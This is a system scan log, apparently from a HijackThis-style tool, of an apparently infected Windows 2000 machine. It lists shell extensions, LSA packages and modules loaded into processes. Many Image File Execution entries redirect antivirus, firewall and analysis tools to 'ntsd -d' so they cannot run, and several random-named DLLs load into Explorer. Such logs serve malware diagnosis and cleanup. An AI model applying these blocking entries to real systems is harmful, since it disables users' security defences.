O31 - 未知 - SEApproved: {E3A8BDE6-ABCE-11d0-BC4B-00C04FD929DB} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {E8BB6DC0-6B4E-11d0-92DB-00A0C90C2BD7} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {7D559C10-9FE9-11d0-93F7-00AA0059CE02} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {E6CC6978-6B6E-11D0-BECA-00C04FD940BE} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {D8BD2030-6FC9-11D0-864F-00AA006809D9} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {7FC0B86E-5FA7-11d1-BC7C-00C04FD929DB} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {8BEBB290-52D0-11D0-B7F4-00C04FD706EC} - C:\WINNT\system32\thumbvw.dll - Microsoft Corporation - Thumbnail View Extension - 5.0.3502.6601 - 187664 - a1f51ae9c2ee70de7668a3437c514631
O31 - 未知 - SEApproved: {EAB841A0-9550-11CF-8C16-00805F1408F3} - C:\WINNT\system32\thumbvw.dll - Microsoft Corporation - Thumbnail View Extension - 5.0.3502.6601 - 187664 - a1f51ae9c2ee70de7668a3437c514631
O31 - 未知 - SEApproved: {1AEB1360-5AFC-11D0-B806-00C04FD706EC} - C:\WINNT\system32\thumbvw.dll - Microsoft Corporation - Thumbnail View Extension - 5.0.3502.6601 - 187664 - a1f51ae9c2ee70de7668a3437c514631
O31 - 未知 - SEApproved: {9DBD2C50-62AD-11D0-B806-00C04FD706EC} - C:\WINNT\system32\thumbvw.dll - Microsoft Corporation - Thumbnail View Extension - 5.0.3502.6601 - 187664 - a1f51ae9c2ee70de7668a3437c514631
O31 - 未知 - SEApproved: {500202A0-731E-11D0-B829-00C04FD706EC} - C:\WINNT\system32\thumbvw.dll - Microsoft Corporation - Thumbnail View Extension - 5.0.3502.6601 - 187664 - a1f51ae9c2ee70de7668a3437c514631
O31 - 未知 - SEApproved: {352EC2B7-8B9A-11D1-B8AE-006008059382} - C:\WINNT\system32\appwiz.cpl - Microsoft Corporation - Shell Application Manager - 5.0.2195.6624 - 301328 - 57920edbc003f186547e7127a119dc00
O31 - 未知 - SEApproved: {0B124F8C-91F0-11D1-B8B5-006008059382} - C:\WINNT\system32\appwiz.cpl - Microsoft Corporation - Shell Application Manager - 5.0.2195.6624 - 301328 - 57920edbc003f186547e7127a119dc00
O31 - 未知 - SEApproved: {CFCCC7A0-A282-11D1-9082-006008059382} - C:\WINNT\system32\appwiz.cpl - Microsoft Corporation - Shell Application Manager - 5.0.2195.6624 - 301328 - 57920edbc003f186547e7127a119dc00
O31 - 未知 - SEApproved: {fe1290f0-cfbd-11cf-a330-00aa00c16e65} - C:\WINNT\system32\dsfolder.dll - Microsoft Corporation - Directory Service UI - 5.0.2195.6601 - 41744 - 9996e5b7a4e0b37235cf4cf6e80daa79
O31 - 未知 - SEApproved: {9E51E0D0-6E0F-11d2-9601-00C04FA31A86} - C:\WINNT\system32\dsfolder.dll - Microsoft Corporation - Directory Service UI - 5.0.2195.6601 - 41744 - 9996e5b7a4e0b37235cf4cf6e80daa79
O31 - 未知 - SEApproved: {8A23E65E-31C2-11d0-891C-00A024AB2DBB} - C:\WINNT\system32\dsquery.dll - Microsoft Corporation - Directory Service Find - 5.0.2195.6622 - 157456 - 82b6edd86a4c5344d43785dfc8e18cb6
O31 - 未知 - SEApproved: {163FDC20-2ABC-11d0-88F0-00A024AB2DBB} - C:\WINNT\system32\dsquery.dll - Microsoft Corporation - Directory Service Find - 5.0.2195.6622 - 157456 - 82b6edd86a4c5344d43785dfc8e18cb6
O31 - 未知 - SEApproved: {F020E586-5264-11d1-A532-0000F8757D7E} - C:\WINNT\system32\dsquery.dll - Microsoft Corporation - Directory Service Find - 5.0.2195.6622 - 157456 - 82b6edd86a4c5344d43785dfc8e18cb6
O31 - 未知 - SEApproved: {0D45D530-764B-11d0-A1CA-00AA00C16E65} - C:\WINNT\system32\dsuiext.dll - Microsoft Corporation - Directory Service Common UI - 5.0.2195.6611 - 110864 - e6de9ea6d2cb04a7f6e13a2b521691ab
O31 - 未知 - SEApproved: {62AE1F9A-126A-11D0-A14B-0800361B1103} - C:\WINNT\system32\dsuiext.dll - Microsoft Corporation - Directory Service Common UI - 5.0.2195.6611 - 110864 - e6de9ea6d2cb04a7f6e13a2b521691ab
O31 - 未知 - SEApproved: {450D8FBA-AD25-11D0-98A8-0800361B1103} - C:\WINNT\system32\mydocs.dll - Microsoft Corporation - My Documents Folder UI - 5.0.3502.6601 - 57104 - 34946facb1e14d39158045f772ee7271
O31 - 未知 - SEApproved: {ECF03A33-103D-11d2-854D-006008059367} - C:\WINNT\system32\mydocs.dll - Microsoft Corporation - My Documents Folder UI - 5.0.3502.6601 - 57104 - 34946facb1e14d39158045f772ee7271
O31 - 未知 - SEApproved: {ECF03A32-103D-11d2-854D-006008059367} - C:\WINNT\system32\mydocs.dll - Microsoft Corporation - My Documents Folder UI - 5.0.3502.6601 - 57104 - 34946facb1e14d39158045f772ee7271
O31 - 未知 - SEApproved: {4a7ded0a-ad25-11d0-98a8-0800361b1103} - C:\WINNT\system32\mydocs.dll - Microsoft Corporation - My Documents Folder UI - 5.0.3502.6601 - 57104 - 34946facb1e14d39158045f772ee7271
O31 - 未知 - SEApproved: {750fdf0e-2a26-11d1-a3ea-080036587f03} - C:\WINNT\system32\cscui.dll - Microsoft Corporation - Client Side Caching UI - 5.0.2195.6705 - 242960 - c468a0ce7f1e749276e3542e84ddf66c
O31 - 未知 - SEApproved: {10CFC467-4392-11d2-8DB4-00C04FA31A66} - C:\WINNT\system32\cscui.dll - Microsoft Corporation - Client Side Caching UI - 5.0.2195.6705 - 242960 - c468a0ce7f1e749276e3542e84ddf66c
O31 - 未知 - SEApproved: {AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E} - C:\WINNT\system32\cscui.dll - Microsoft Corporation - Client Side Caching UI - 5.0.2195.6705 - 242960 - c468a0ce7f1e749276e3542e84ddf66c
O31 - 未知 - SEApproved: {7A80E4A8-8005-11D2-BCF8-00C04F72C717} - C:\WINNT\system32\mmcshext.dll - Microsoft Corporation - MMC Shell Extension DLL - 5.0.2153.1 - 24848 - 2ab64c39b0198618ee8bf5bb0ecbee99
O31 - 未知 - SEApproved: {0CD7A5C0-9F37-11CE-AE65-08002B2E1262} - C:\WINNT\system32\cabview.dll - Microsoft Corporation - Cabinet File Viewer Shell Extension - 5.0.2920.0 - 31504 - c305e89ba8e21e1dfa19190172416fba
O31 - 未知 - SEApproved: {B41DB860-8EE4-11D2-9906-E49FADC173CA} - C:\Program Files\WinRAR\rarext.dll -  -  -  - 124416 - 1b089bd70767a1ca5419a24b581cc753
O31 - 未知 - SEApproved: 无效的CLSID:Shell Extensions for RealOne Player -  -  -  -  - 0 -
O31 - 未知 - SEApproved: 无效的CLSID:vrv -  -  -  -  - 0 -
O31 - 未知 - Directory Menu: {750fdf0e-2a26-11d1-a3ea-080036587f03} - C:\WINNT\system32\cscui.dll - Microsoft Corporation - Client Side Caching UI - 5.0.2195.6705 - 242960 - c468a0ce7f1e749276e3542e84ddf66c
O31 - 未知 - Directory Menu: {A470F8CF-A1E8-4f65-8335-227475AA5C46} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - Directory Menu: {f81e9010-6ea4-11ce-a7ff-00aa003ca9f6} - C:\WINNT\system32\ntshrui.dll - Microsoft Corporation - Shell extensions for sharing - 5.0.2134.1 - 47888 - 89ed3a9e1f760bd30db6da2f93d9e71a
O31 - 未知 - Directory Menu: {C14F7681-33D8-11D3-A09B-00500402F30A} - C:\WINNT\system32\bxymenu.dll -  -  -  - 40960 - 79b41fc17ca741cc368bd32bff77a5b8
O31 - 未知 - Directory Menu: {B41DB860-8EE4-11D2-9906-E49FADC173CA} - C:\Program Files\WinRAR\rarext.dll -  -  -  - 124416 - 1b089bd70767a1ca5419a24b581cc753
O31 - 未知 - Image Execution: 360rpt.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: 360safe.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: 360safebox.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: 360tray.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: adam.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: AgentSvr.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: AppSvc32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: autoruns.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: avconsol.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: avgrssvc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: AvMonitor.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: avp.com - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: avp.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: CCenter.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: ccSvcHst.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: ctfmon.exe - C:\WINNT\SoundMan.exe - Realtek Semiconductor Corp. - Realtek Sound Manager - 5.1.0.28 - 67584 - e0584ee5e7f07f04a879b19a37465588
O31 - 未知 - Image Execution: EGHOST.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: FileDsty.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: FTCleanerShell.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: FYFireWall.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: HijackThis.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: IceSword.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: iparmo.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Iparmor.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: isPwdSvc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: kabaload.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KaScrScn.SCR - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KASMain.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KASTask.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAV32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAVDX.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAVPF.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAVPFW.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAVSetup.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KAVStart.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KISLnchr.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KMailMon.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KMFilter.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KPFW32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KPFW32X.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KPfwSvc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KRegEx.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KRepair.com - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KsLoader.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVCenter.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KvDetect.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KvfwMcl.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVMonXP.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVMonXP_1.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: kvol.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: kvolself.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KvReport.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVScan.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVSrvXP.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KVStub.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: kvupload.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: kvwsc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KvXP.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KvXP_1.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KWatch.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KWatch9x.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: KWatchX.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: MagicSet.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: mcconsol.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: mmqczj.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: mmsk.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Navapsvc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Navapw32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: nod32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: nod32krn.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: nod32kui.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: NPFMntor.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: OllyDBG.EXE - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: OllyICE.EXE - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: PFW.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: PFWLiveUpdate.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: procexp.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: QHSET.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: QQDoctor.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: QQKav.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Ras.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RavMonD.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RavStub.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RawCopy.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RegClean.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RegTool.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: rfwcfg.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: rfwmain.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: rfwProxy.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: rfwsrv.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: rfwstub.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: RsAgent.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Rsaupd.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: runiep.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: safebank.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: safeboxTray.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: safelive.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: scan32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: shcfg32.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: SmartUp.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: SREng.EXE - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: symlcsvc.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: SysSafe.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: TrojanDetector.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: Trojanwall.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: TrojDie.kxp - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UIHost.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UmxAgent.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UmxAttachment.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UmxCfg.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UmxFwHlp.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UmxPol.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: UpLive.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: vsstat.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: webscanx.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: WinDbg.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: WoptiClean.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - LSA: Authentication Packages - C:\WINNT\system32\msv1_0.dll - Microsoft Corporation - Microsoft Authentication Package v1.0 - 5.0.2195.6926 - 125200 - 1dfa06dea950dff34c57d04b7392d29e
O31 - 未知 - LSA: Notification Packages - C:\WINNT\system32\FPNWCLNT.dll - Microsoft Corporation - FPNW Client DLL - 5.0.2134.1 - 35152 - 9b4d464f0027a23bb82e7d9abec48631
O31 - 未知 - LSA: Notification Packages - ASSFM.dll -  -  -  - 0 -
O31 - 未知 - LSA: Notification Packages - DCSVC.dll -  -  -  - 0 -
O31 - 未知 - LSA: Notification Packages - cecli.dll -  -  -  - 0 -
O31 - 未知 - LSA: Security Packages - C:\WINNT\system32\kerberos.dll - Microsoft Corporation - Kerberos Security Package - 5.0.2195.7053 - 208144 - 3ed2ac7e999788ea1806ad51e48fdf70
O31 - 未知 - LSA: Security Packages - sv1_0.dll -  -  -  - 0 -
O31 - 未知 - LSA: Security Packages - channel.dll -  -  -  - 0 -

=======================================
O40 - winlogon.exe - Microsoft Corporation - C:\WINNT\system32\sfcfiles.dll - Windows 2000 System File Checker - 3d30ab66e13c66712d088e8c291e8c97
O40 - winlogon.exe - Microsoft Corporation - C:\WINNT\system32\mscat32.dll - MSCAT32 Forwarder DLL - 8fa5a78ab9b12c18b6ef8a839edff012
O40 - winlogon.exe - Microsoft Corporation - C:\WINNT\system32\wzcdlg.dll - Wireless Zero Configuration Service UI - 752c43e74027c22db1d1ef45431c1552
O40 - winlogon.exe - Microsoft Corporation - C:\WINNT\system32\LZ32.DLL - LZ Expand/Compress API DLL - 51a5945c1e03a2d1761bcfd7e373d513
O40 - services.exe - Microsoft Corporation - C:\WINNT\system32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - services.exe - Microsoft Corporation - C:\WINNT\system32\msgsvc.dll - NT Messenger Service - 40acca5df8ed2c90c57a4907779dccae
O40 - services.exe - Microsoft Corporation - C:\WINNT\system32\wmicore.dll - WMI service core functionality - 65a14fb350e366df6278fcb299653abb
O40 - services.exe - Microsoft Corporation - C:\WINNT\system32\msafd.dll - Microsoft Windows Sockets 2.0 Service Provider - 29d56fdbb0e97e63ffeda26f988187a5
O40 - services.exe - Microsoft Corporation - C:\WINNT\system32\appmgmts.dll - Software installation Service - 59e2f2a7415facd6f8f69ed3ce885f6b
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\rsabase.dll - Microsoft Base Cryptographic Provider (Export Version) - 99cc1857e220543e0e63a792dfb7e228
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\RASSFM.dll - Remote Access Subauthentication dll - 9f0fd7c5dc8f9cb68f324eed8bd721af
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\SFMAPI.dll - Windows NT Macintosh File Service Client - 59bc7f08335e17ae19a50f2ee6bc343c
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\KDCSVC.dll - KDC Service - dd0d6ce4fded8d18461aa0b96207577a
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\NTDSA.dll - NT5DS - dd716f3e6ac9635e226794fcb42042b2
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\NTDSATQ.dll - Asynchronous Thread Queue - 80bc18a21a36f9edaf2f2fe3fb4d746d
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\polagent.dll - IPSec Policy Agent Service - 24afcba6cab4513aa65563cda47c2a38
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\MFC42u.DLL - MFCDLL Shared Library - Retail Version - c37ddf7aa6792a00984f60bf6bddb709
O40 - lsass.exe - Microsoft Corporation - C:\WINNT\system32\msafd.dll - Microsoft Windows Sockets 2.0 Service Provider - 29d56fdbb0e97e63ffeda26f988187a5
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\system32\msafd.dll - Microsoft Windows Sockets 2.0 Service Provider - 29d56fdbb0e97e63ffeda26f988187a5
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\System32\rnr20.dll - Windows Socket2 NameSpace DLL - bfe16d8857604b624607a7a9d066bf15
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\system32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\System32\wshnetbs.dll - Netbios Windows Sockets Helper DLL - 6d542cd4a296d4535c6ae359689d49f4
O40 - svchost.exe - Microsoft Corporation - c:\winnt\system32\TxfAux.Dll - Support routines for TXF - 2e98c92cab718d233c47042770666817
O40 - svchost.exe - Microsoft Corporation - c:\winnt\system32\ntmssvc.dll - Removable Storage Service - 52b0d055049c59694a92ba4b0604b0e2
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\system32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\system32\ipbootp.dll - IP BOOTP - 34d553251f6ce21eb5dde9a89c4966ca
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\system32\NTMSDBA.dll - Removable Storage Manager DB Object APIs - 24c6ec2518becfcce21bf6a3a6cc4a0a
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\INDICDLL.dll - Keyboard Language Indicator Shell Hook Extension - 0416ddc2575d4afa613a3690a0a73e4a
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\dsquery.dll - Directory Service Find - 82b6edd86a4c5344d43785dfc8e18cb6
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\dsuiext.dll - Directory Service Common UI - e6de9ea6d2cb04a7f6e13a2b521691ab
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\mmcshext.dll - MMC Shell Extension DLL - 2ab64c39b0198618ee8bf5bb0ecbee99
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\MFC42u.DLL - MFCDLL Shared Library - Retail Version - c37ddf7aa6792a00984f60bf6bddb709
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\MSVCP50.dll - Microsoft (R) C++ Runtime Library - ff69b8824a697d73c3b23a82c575867d
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\hhsetup.dll - Microsoft? HTML Help - 74cd91ee65a290fcc76fe1417023a591
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\docprop2.dll - DocProp2 - a4769f665cdd13f51b1e20013bb8a21f
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\MSVFW32.DLL - Microsoft Video for Windows DLL - 496e359ce07594bf98aef35fa173ae59
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\AVIFIL32.DLL - Microsoft AVI File support library - 8abed880eeecf036118c814a1f5b2aa7
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\faxshell.dll - Fax Tiff Data Column Provider - 9dc8a8c3d8cbb925796aca18fd7cd7a5
O40 - Explorer.EXE -  - C:\WINNT\system32\msosiocp.dll -  - c00cbed127ef717308a2adba6d2d3a29
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\LZ32.DLL - LZ Expand/Compress API DLL - 51a5945c1e03a2d1761bcfd7e373d513
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\msafd.dll - Microsoft Windows Sockets 2.0 Service Provider - 29d56fdbb0e97e63ffeda26f988187a5
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\System32\rnr20.dll - Windows Socket2 NameSpace DLL - bfe16d8857604b624607a7a9d066bf15
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - Explorer.EXE -  - C:\WINNT\system32\WSockDrv32.dll -  - 2cf330af1db13b5c24022cb5975ce22d
O40 - Explorer.EXE -  - C:\WINNT\system32\MsIMMs32.dll -  - ea429067ffe1377e6aba776de72972ab
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\eipwdjowow.dll - Windows XP MSPLAY API DLL - d8b92f8d1353efad84a9b0e7a30caa70
O40 - Explorer.EXE -  - C:\WINNT\system32\AVPSrv.dll -  - 008a1bf82e58ab7c8ba097daf332be46
O40 - Explorer.EXE -  - C:\WINNT\system32\upxdnd.dll -  - 1a431c17e3e382e8346a5a03fba54b7e
O40 - Explorer.EXE -  - C:\WINNT\system32\tciocp32.dll -  - 128d92e87fb8fa1cf26bd938d7cafabb
O40 - Explorer.EXE -  - C:\WINNT\system32\xgnfn.dll -  - 1feb902c9e6697d0ae55d040004e85db
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\vagnydjwm.dll - Windows XP MSPLAY API DLL - 05ead05e62bc041d495b23d41006d2f2
O40 - Explorer.EXE -  - C:\WINNT\system32\msccrt.dll -  - fb41ed5230b123ce9242558700698fb9
O40 - Explorer.EXE -  - C:\WINNT\system32\DbgHlp32.dlL -  - 7e76fd8bffaa744276fa236a486ee9e5
O40 - Explorer.EXE -  - C:\WINNT\system32\cmdbcs.dll -  - 70f49152f02bd8f594670b79047a5d0a
O40 - Explorer.EXE -  - C:\WINNT\system32\klvtuwvr.dll -  - 3bf4b68236ad2a66ebc278137fd7f73b
O40 - Explorer.EXE -  - C:\WINNT\system32\PTSShell.dll -  - d94f215968e91b2c27472cba1237ae47
O40 - Explorer.EXE -  - C:\WINNT\system32\LotusHlp.dll -  - 5cb077dd7ad75c4274213214137b93da
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\agntekpdj.dll - Windows XP MSPLAY API DLL - 3e19906f2cdb977557bc44845a336034
O40 - Explorer.EXE -  - C:\WINNT\system32\Kvsc3.dll -  - c23cfc0f999ef78e3ea7703e14b1d3c0
O40 - Explorer.EXE -  - C:\WINNT\system32\pahzij.dll -  - ca5e213d28e213537eb3debf28163ae7
O40 - Explorer.EXE -  - C:\WINNT\system32\WINSvr32.dll -  - 2044393056fb0c2c0ad42fc351fa4a3d
O40 - Explorer.EXE -  - C:\WINNT\system32\xfgnxfn.dll -  - 00ac8155800a8a9e5572daefb01c6f18
O40 - Explorer.EXE -  - C:\WINNT\system32\jwlah.dll -  - 0f35e25bb3598812a32a461abf7f2229
O40 - Explorer.EXE -  - C:\WINNT\system32\hgfhk.dll -  - 6fff2e6a214d8d0ed86450ad53751ae4
O40 - Explorer.EXE -  - C:\WINNT\system32\duygnef.dll -  - 4723137fc6dc58aa4be6d30c45efc6cb
O40 - Explorer.EXE -  - C:\WINNT\system32\zfdzb.dll -  - fc838483660b00b366e8f93752e301ad
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\c_is2022.dll - ISO-2022 Code Page Translation DLL - c8ec660fa1a8ca99302ab607e9409e38
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\diskcopy.dll - Windows DiskCopy - df03f95f5216e6d612f7925c83c2c263
